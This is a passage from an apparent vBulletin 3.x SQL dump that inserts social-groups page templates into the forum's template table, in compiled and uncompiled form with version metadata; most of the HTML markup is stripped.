\r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n $group[categoryname] \r\n \r\n \r\n\r\n $group[mediumdescription]
\r\n\r\n \r\n $group[members] \r\n \r\n $group[discussions] \r\n $group[visible] \r\n \r\n $group[picturecount] $group[picturecount] \r\n\r\n \r\n \r\n \r\n \r\n $group[lastpostdate]\r\n \r\n $group[lastposttime] \r\n \r\n
\r\n \r\n \r\n $group[createdate]\r\n
\r\n \r\n \r\n \r\n ', 'template', 1232979416, 'vBulletin Solutions', '3.8.1', 'vbulletin'),
(1589, -1, 'socialgroups_groupmodlist_bit', '\r\n \r\n \r\n $group[shortdescription]
\r\n \r\n \r\n $vbphrase[group_members] \r\n session->vars[\'sessionurl\'] . \"do=viewmembers&groupid=$group[groupid]\\\">$group[members] \r\n\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime] \r\n \") : (\"\")).\"\r\n
\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \") : (\"\r\n \r\n
\r\n $vbphrase[group_created]\r\n
\r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n
$group[lastposttime] \r\n \") : (\"\")).\"\r\n
\r\n \")).\"\r\n \r\n \r\n\r\n\r\n $vbphrase[messages] \r\n $group[visible] \r\n \r\n\".(($show[\'pictureinfo\']) ? (\"\r\n\r\n $vbphrase[pictures] \r\n \r\n \".(($group[\'picturecount\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=grouppictures&groupid=$group[groupid]\\\">$group[picturecount] \r\n \") : (\"\r\n $group[picturecount]\r\n \")).\"\r\n \r\n \r\n\") : (\"\")).\"', '\r\n 3 2\">\r\n \r\n $group[shortdescription]
\r\n \r\n \r\n $vbphrase[group_members] \r\n $group[members] \r\n\r\n 3 2\">\r\n \r\n \r\n \r\n \r\n \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime] \r\n \r\n
\r\n \r\n \r\n
$vbphrase[by_x] \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n $vbphrase[group_created]\r\n
\r\n $group[lastpostdate] \r\n
\r\n $group[lastposttime] \r\n \r\n
\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[messages] \r\n $group[visible] \r\n \r\n\r\n\r\n $vbphrase[pictures] \r\n \r\n \r\n $group[picturecount] \r\n \r\n $group[picturecount]\r\n \r\n \r\n \r\n ', 'template', 1214929083, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1590, -1, 'socialgroups_groupsub_bit', '\r\n \r\n \r\n $group[shortdescription]
\r\n \r\n \r\n\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime] \r\n \") : (\"\")).\"\r\n
\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \") : (\"\r\n \r\n
\r\n $vbphrase[group_created]\r\n
\r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n
$group[lastposttime] \r\n \") : (\"\")).\"\r\n
\r\n \")).\"\r\n \r\n \r\n \r\n $group[notification]\r\n \r\n \r\n \r\n \r\n \r\n ', '\r\n \r\n \r\n $group[shortdescription]
\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime] \r\n \r\n
\r\n \r\n \r\n
$vbphrase[by_x] \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n $vbphrase[group_created]\r\n
\r\n $group[lastpostdate] \r\n
\r\n $group[lastposttime] \r\n \r\n
\r\n \r\n \r\n \r\n \r\n $group[notification]\r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1234873375, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1591, -1, 'socialgroups_manage', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n $vbphrase[social_group] : $group[name] \r\n \r\n $vbphrase[manage_members]\r\n \r\n $vbphrase[pending_and_invited_members]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1208876251, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1592, -1, 'socialgroups_managebit', '\r\n \r\n \r\n \r\n', '\r\n \r\n \r\n \r\n', 'template', 1200923125, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1593, -1, 'socialgroups_managemembers', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n\r\n \r\n\r\n\r\n $header\r\n $navbar\r\n\r\n \r\n\r\n\r\n \r\n$footer\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n\r\n \r\n\r\n\r\n $header\r\n $navbar\r\n\r\n \r\n \r\n $group[name] $vbphrase[manage_members] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n$footer\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1211192623, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1594, -1, 'socialgroups_memberlist', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n $memberinfo_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[members_in_group_x]\", \"$group[name]\") . \"\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\".(($pagenav) ? (\"\r\n $pagenav
\r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n $memberinfo_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n $vbphrase[members_in_group_x] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n $pagenav
\r\n \r\n\r\n$footer\r\n\r\n', 'template', 1195748117, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1595, -1, 'socialgroups_message', '\r\n \".(($message[\'goto\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n \".(($message[\'avatarurl\']) ? (\"\r\n
\r\n
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n
$message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time] \") : (\"\")).\"
\r\n \".(($message[\'postuserid\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername] \r\n \") : (\"\r\n
$message[musername] \r\n \")).\"\r\n \r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
\r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \" \r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \" \r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n
\r\n \".(($show[\'moderation\']) ? (\"
$vbphrase[this_message_is_moderated]
\") : (\"\")).\"\r\n
$message[message]
\r\n\r\n
\r\n
\r\n \".(($message[\'avatarurl\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \".(($show[\'edit\'] AND $show[\'popups\'] AND !$message[is_discussion]) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
\r\n
', '\r\n
\r\n \r\n \r\n
\r\n
\r\n
\r\n \r\n
width=\"$message[avatarwidth]\"
height=\"$message[avatarheight]\" border=\"0\" alt=\"$message[username]\" />
\r\n
\r\n \r\n \r\n
\r\n
\r\n
\r\n
$message[date] $message[time]
\r\n
\r\n $message[musername] \r\n \r\n $message[musername] \r\n \r\n \r\n
\r\n \r\n
\r\n $vbphrase[group_x] \r\n \r\n
\r\n $vbphrase[discussion_x] \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n
\r\n
$vbphrase[this_message_is_moderated]
\r\n
$message[message]
\r\n\r\n
\r\n
\r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n
', 'template', 1229341458, 'vBulletin Solutions', '3.8.0 Release Candidate 2', 'vbulletin'),
(1596, -1, 'socialgroups_message_deleted', '\r\n
\r\n
\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n
$message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time] \") : (\"\")).\"
\r\n \".(($message[\'postuserid\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername] \r\n \") : (\"\r\n
$message[musername] \r\n \")).\"\r\n\r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
\r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \" \r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \" \r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n
\r\n \".(($show[\'deleted\']) ? (\"\r\n $message[message]
\r\n \") : (\"\")).\"\r\n
\r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason] \") : (\"\")).\"\r\n
\r\n \r\n
\r\n
\r\n
\r\n
', '\r\n
\r\n
\r\n
\r\n
\r\n
$message[date] $message[time]
\r\n
\r\n $message[musername] \r\n \r\n $message[musername] \r\n \r\n\r\n
\r\n \r\n
\r\n $vbphrase[group_x] \r\n \r\n
\r\n $vbphrase[discussion_x] \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n
\r\n
\r\n $message[message] \r\n \r\n
\r\n
$vbphrase[message_deleted_by_x] \r\n
$vbphrase[reason] $message[del_reason] \r\n
\r\n \r\n
\r\n
\r\n
\r\n
', 'template', 1219079849, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin');
INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`) VALUES
(1597, -1, 'socialgroups_message_ignored', '\r\n
\r\n
\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n
$message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time] \") : (\"\")).\"
\r\n
session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"username\\\">$message[musername] \r\n\r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
\r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \" \r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \" \r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n \r\n
\r\n \".(($show[\'moderation\']) ? (\"
$vbphrase[this_message_is_moderated]
\") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n \r\n
\r\n
\r\n
\r\n
', '\r\n
\r\n
\r\n
\r\n
\r\n
$message[date] $message[time]
\r\n
$message[musername] \r\n\r\n
\r\n \r\n
\r\n $vbphrase[group_x] \r\n \r\n
\r\n $vbphrase[discussion_x] \r\n \r\n
\r\n \r\n
\r\n
\r\n \r\n
\r\n
$vbphrase[this_message_is_moderated]
\r\n
$vbphrase[message_hidden_x_on_ignore_list] \r\n \r\n
\r\n
\r\n
\r\n
', 'template', 1219079869, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1598, -1, 'socialgroups_mygroups_bit', '', '', 'template', 1218628617, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1599, -1, 'socialgroups_mygroups_listview_bit', '\r\n \r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$mygroup[categoryid]\\\" style=\\\"font-weight:normal\\\">$mygroup[categoryname] \r\n \r\n \r\n \r\n $mygroup[joindate] \r\n \r\n \".(($mygroup[\'group_options\']) ? (\"\r\n \".(($mygroup[\'edit_group\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($mygroup[\'delete_group\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($mygroup[\'leave_group\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=leave&groupid=$mygroup[groupid]\\\">$vbphrase[leave_social_group] \r\n \") : (\"\")).\"\r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n ', '\r\n \r\n $mygroup[categoryname] \r\n \r\n \r\n \r\n $mygroup[joindate] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[leave_social_group] \r\n \r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n ', 'template', 1232023585, 'vBulletin Solutions', '3.8.1', 'vbulletin'),
(1600, -1, 'socialgroups_newgroup_bit', '', '', 'template', 1218628472, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1601, -1, 'socialgroups_newgroup_listview_bit', '\r\n \r\n \r\n \r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$group[categoryid]\\\" style=\\\"font-weight:normal\\\">$group[categoryname] \r\n ', '\r\n \r\n \r\n \r\n $group[categoryname] \r\n ', 'template', 1232023618, 'vBulletin Solutions', '3.8.1', 'vbulletin'),
(1602, -1, 'socialgroups_overview', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_overview_start]\r\n\r\n\r\n
\r\n\r\n $template_hook[group_overview_before_categories]\r\n\r\n \".(($categorybits) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_categories]\r\n\r\n \".(($randomgroup) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_random_group]\r\n\r\n \".(($owngroup) ? (\"\r\n
\r\n $owngroup\r\n
\r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_own_groups]\r\n\r\n\r\n
\r\n
\r\n \r\n $vbphrase[your_groups] \r\n \r\n\r\n \".(($show[\'sgicons\']) ? (\"\r\n\r\n \r\n \".(($mygroup_bits) ? (\"\r\n \r\n $mygroup_bits\r\n \r\n \") : (\"\r\n \r\n $vbphrase[you_are_not_a_member_of_any_groups]\r\n \r\n \")).\"\r\n \r\n\r\n \") : (\"\r\n\r\n \r\n $vbphrase[group_name] \r\n $vbphrase[joined_group] \r\n $vbphrase[options] \r\n \r\n\r\n $mygroup_bits\r\n\r\n \")).\"\r\n\r\n
\r\n
\r\n\r\n
\r\n\r\n $template_hook[group_overview_after_your_groups]\r\n\r\n
\r\n
\r\n \r\n \r\n $vbphrase[new_groups]\r\n \r\n \r\n\r\n \".(($show[\'sgicons\']) ? (\"\r\n\r\n \r\n \".(($newgroupbits) ? (\"\r\n \r\n $newgroupbits\r\n \r\n \") : (\"\r\n \r\n $vbphrase[no_social_groups] \r\n \".(($show[\'creategroup\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=create\\\" rel=\\\"nofollow\\\">$vbphrase[create_a_new_group] \r\n \") : (\"\")).\"\r\n \r\n \")).\"\r\n \r\n\r\n \") : (\"\r\n\r\n \r\n $vbphrase[group_name] \r\n $vbphrase[category] \r\n \r\n\r\n $newgroupbits\r\n\r\n \")).\"\r\n\r\n \".(($newgroupbits) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n $template_hook[group_overview_after_new_groups]\r\n\r\n \".(($show[\'creategroup\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n\r\n
\r\n\r\n $template_hook[group_overview_after_action_links]\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_overview_start]\r\n\r\n\r\n
\r\n\r\n $template_hook[group_overview_before_categories]\r\n\r\n
\r\n \r\n \r\n\r\n $template_hook[group_overview_after_categories]\r\n\r\n
\r\n \r\n
\r\n \r\n \r\n $vbphrase[random_group]\r\n \r\n \r\n \r\n \r\n $randomgroup[categoryname]\'>$vbphrase[in_category_x] \r\n class=\"unread\">$randomgroup[name] \r\n \r\n \r\n \r\n \r\n \r\n $randomgroup[mediumdescription] \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n $template_hook[group_random_group_info]\r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n \r\n\r\n $template_hook[group_overview_after_random_group]\r\n\r\n
\r\n \r\n $owngroup\r\n
\r\n \r\n\r\n $template_hook[group_overview_after_own_groups]\r\n\r\n\r\n
\r\n
\r\n \r\n $vbphrase[your_groups] \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n $mygroup_bits\r\n \r\n \r\n \r\n $vbphrase[you_are_not_a_member_of_any_groups]\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n $vbphrase[group_name] \r\n $vbphrase[joined_group] \r\n $vbphrase[options] \r\n \r\n\r\n $mygroup_bits\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n
\r\n\r\n $template_hook[group_overview_after_your_groups]\r\n\r\n
\r\n
\r\n \r\n \r\n $vbphrase[new_groups]\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n $newgroupbits\r\n \r\n \r\n \r\n $vbphrase[no_social_groups] \r\n \r\n $vbphrase[create_a_new_group] \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n $vbphrase[group_name] \r\n $vbphrase[category] \r\n \r\n\r\n $newgroupbits\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n\r\n $template_hook[group_overview_after_new_groups]\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n\r\n $template_hook[group_overview_after_action_links]\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1235391552, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1603, -1, 'socialgroups_owngroup_bit', '\r\n\r\n\r\n \r\n $vbphrase[groups_you_created]\r\n \r\n \r\n\r\n \r\n $vbphrase[last_updated]: $owngroup[lastupdatedate] $owngroup[lastupdatetime] \r\n session->vars[\'sessionurl\'] . \"groupid=$owngroup[groupid]\\\" \".((!$owngroup[is_read]) ? (\"class=\\\"unread\\\"\") : (\"\")).\">$owngroup[name] \r\n \r\n \r\n \r\n \r\n\r\n \r\n \".(($show[\'sgicons\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n
\r\n \r\n \r\n \r\n \".(($show[\'pictureinfo\'] AND $show[\'messageinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \".(($show[\'pictureinfo\'] AND !$show[\'messageinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'messageinfo\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n
\r\n
\r\n $template_hook[group_own_group_info]\r\n \r\n \r\n\r\n \r\n \r\n
', '\r\n\r\n\r\n \r\n $vbphrase[groups_you_created]\r\n \r\n \r\n\r\n \r\n unread\" style=\"float:$stylevar[right]\">$vbphrase[last_updated]: $owngroup[lastupdatedate] $owngroup[lastupdatetime] \r\n class=\"unread\">$owngroup[name] \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n $template_hook[group_own_group_info]\r\n \r\n \r\n\r\n \r\n \r\n
', 'template', 1235391594, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1604, -1, 'socialgroups_picture', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $picturecomment_css\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \".(($show[\'picture_nav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \" . construct_phrase(\"$vbphrase[picture_x_of_y_from_group_z]\", \"$pic_location[pic_position]\", \"$group[picturecount]\", \"$group[name]\") . \"\r\n \r\n \r\n\r\n \r\n \r\n \r\n session->vars[\'sessionurl\'] . \"groupid=$group[groupid]&pictureid=$pictureinfo[pictureid]\\\" alt=\\\"$vbphrase[picture]\\\" /> \r\n \r\n \".(($pictureinfo[\'caption_html\']) ? (\"\r\n \r\n $pictureinfo[caption_html] \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($show[\'edit_picture_option\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \".(($show[\'edit_picture_option\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'remove_picture_option\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'reportlink\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n $vbphrase[picture_added]: $pictureinfo[adddate] \".((!$show[\'detailedtime\']) ? (\"$pictureinfo[addtime] \") : (\"\")).\"
\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n\".(($show[\'picture_nav\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$picturecomment_commentarea\r\n\r\n\".(($show[\'picturecomment_options\'] AND $show[\'picture_nav\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $picturecomment_css\r\n $vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n $vbphrase[picture_x_of_y_from_group_z] \r\n \r\n \r\n\r\n \r\n 450 $pictureinfo[width]\" cellpadding=\"$stylevar[cellpadding]\">\r\n \r\n \r\n \r\n \r\n \r\n $pictureinfo[caption_html] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n $vbphrase[picture_added]: $pictureinfo[adddate] $pictureinfo[addtime]
\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n$picturecomment_commentarea\r\n\r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n', 'template', 1214218742, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1605, -1, 'socialgroups_picturebit', '', '', 'template', 1213886222, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1606, -1, 'socialgroups_pictures', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"$pagenav
\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($pagenav) ? (\"$pagenav
\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$pagenav
\r\n\r\n\r\n\r\n$pagenav
\r\n\r\n$footer\r\n\r\n', 'template', 1196261152, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1607, -1, 'socialgroups_search', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n \r\n \".((!$grouplisttitle) ? (\"$vbphrase[errors_occured_with_search]\r\n \") : (\"$grouplisttitle\")).\"\r\n \r\n \r\n\r\n \r\n \".(($show[\'noresults\']) ? (\"\r\n $errorlist \r\n \") : (\"\r\n $errorlist \r\n \")).\"\r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\nsession->vars[\'sessionurl\'] . \"do=grouplist\\\" method=\\\"post\\\">\r\n\r\n\r\n $vbphrase[advanced_search] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n $vbphrase[search_by_key_word] \r\n \r\n
$vbphrase[key_words]:
\r\n
\r\n
\r\n \r\n \r\n $vbphrase[find_groups_with] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[creation_date_filter] \r\n \r\n
$vbphrase[date_is_before]
\r\n
\r\n \r\n \r\n $vbphrase[month]
\r\n \r\n \r\n --- \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n
\r\n \r\n \r\n $vbphrase[day]
\r\n
\r\n \r\n \r\n $vbphrase[year]
\r\n
\r\n \r\n \r\n
\r\n
$vbphrase[date_is_after]
\r\n
\r\n \r\n \r\n \r\n $vbphrase[month] \r\n
\r\n \r\n \r\n --- \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n
\r\n \r\n \r\n $vbphrase[day]
\r\n
\r\n \r\n \r\n $vbphrase[year]
\r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n $vbphrase[category_filter] \r\n \r\n
$vbphrase[is_in_category]
\r\n
\r\n \r\n $category_options\r\n \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
